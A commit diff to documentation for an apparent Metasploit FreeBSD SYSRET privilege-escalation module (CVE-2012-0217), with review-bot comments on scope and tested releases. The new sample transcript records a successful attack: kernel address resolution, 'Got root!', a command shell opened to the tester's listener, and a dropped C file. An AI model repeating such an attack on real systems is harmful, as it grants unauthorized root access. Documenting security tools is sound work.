Update documentation
parent
e4fc4e654d
commit
1cf5c79cc8
@ -1,7 +1,7 @@
## Description

This module exploits a vulnerability in the FreeBSD 9.0-RELEASE (x64)
kernel, when running on 64-bit Intel processors.
This module exploits a vulnerability in the FreeBSD kernel,
when running on 64-bit Intel processors.

By design, 64-bit processors following the X86-64 specification will
trigger a general protection fault (GPF) when executing a SYSRET

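Review bot: dropping the release qualifier leaves the new Description sentence, "a vulnerability in the FreeBSD kernel, when running on 64-bit Intel processors", unscoped, so a reader of this paragraph alone cannot tell which kernels are affected. Suggest naming the issue in the sentence, e.g. `This module exploits CVE-2012-0217, a vulnerability in the FreeBSD kernel` (the CVE identifier already appears in the module output later in this file), and adding `Affected releases are listed under Vulnerable Application.` Minor: the rewrapped text now breaks after `kernel,` and the comma before `when running` is unnecessary; `the FreeBSD kernel when running on 64-bit Intel processors` reads cleaner.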
@ -15,7 +15,10 @@
## Vulnerable Application

This module has been tested successfully on FreeBSD 9.0-RELEASE.
This module has been tested successfully on:

* FreeBSD 8.3-RELEASE (amd64)
* FreeBSD 9.0-RELEASE (amd64)


## Verification Steps

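Review bot: the new list states a successful test on FreeBSD 8.3-RELEASE (amd64), but the only verification transcript in this file shows `release: 9.0-RELEASE`, so the 8.3 claim has no supporting output. Either add a transcript (or at least the `Retrieving host information...` block) from the 8.3-RELEASE run, or note next to the sample output which list entry it corresponds to, so the tested-on list and the evidence stay in step.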
@ -64,12 +67,31 @@
[*] Max line length is 131073
[*] Writing 218 bytes in 1 chunks of 614 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] [+] SYSRET FUCKUP!!
[*] [+] Start Engine...
[*] [+] Crotz...
[*] [+] Crotz...
[*] [+] Crotz...
[*] [+] Woohoo!!!
[*] CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
[*]
[*] [*] Retrieving host information...
[*] [+] CPU: GenuineIntel
[*] [+] sysname: FreeBSD
[*] [+] release: 9.0-RELEASE
[*] [+] version: FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
[*] [+] machine: amd64
[*] [*] Validating target OS and version...
[*] [+] Vulnerable :-)
[*] [*] Resolving kernel addresses...
[*] [+] Resolved Xofl to 0xffffffff80b02e70
[*] [+] Resolved Xbnd to 0xffffffff80b02ea0
[*] [+] Resolved Xill to 0xffffffff80b02ed0
[*] [+] Resolved Xdna to 0xffffffff80b02f00
[*] [+] Resolved Xpage to 0xffffffff80b03240
[*] [+] Resolved Xfpu to 0xffffffff80b02fc0
[*] [+] Resolved Xalign to 0xffffffff80b03080
[*] [+] Resolved Xmchk to 0xffffffff80b02f60
[*] [+] Resolved Xxmm to 0xffffffff80b02ff0
[*] [*] Setup...
[*] [+] Trigger code...
[*] [+] Trampoline code...
[*] [*] Fire in the hole!
[*] [*] Got root!
[+] Success! Executing payload...
[*] Command shell session 2 opened (123.123.123.188:4444 -> 123.123.123.136:61024) at 2018-12-09 10:40:16 -0500
[+] Deleted /tmp/.mTaR4rAPd.c

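Review bot: the pasted transcript is tied to one test box (the `version:` build string from farrell.cse.buffalo.edu, the resolved `Xofl`/`Xbnd`/... kernel addresses, the 123.123.123.x session endpoints and the random `/tmp/.mTaR4rAPd.c` name), so a sentence before it saying that these values vary per target and per run would stop a reader from treating a different address set or temp file name as a failed run. Separately, the `Writing 218 bytes ... using printf` and `Deleted /tmp/.mTaR4rAPd.c` lines show the module drops a C source file on the target; if building it requires a compiler on the target, that requirement belongs under Vulnerable Application next to the release list, since a reader checking prerequisites will look there rather than in the sample output.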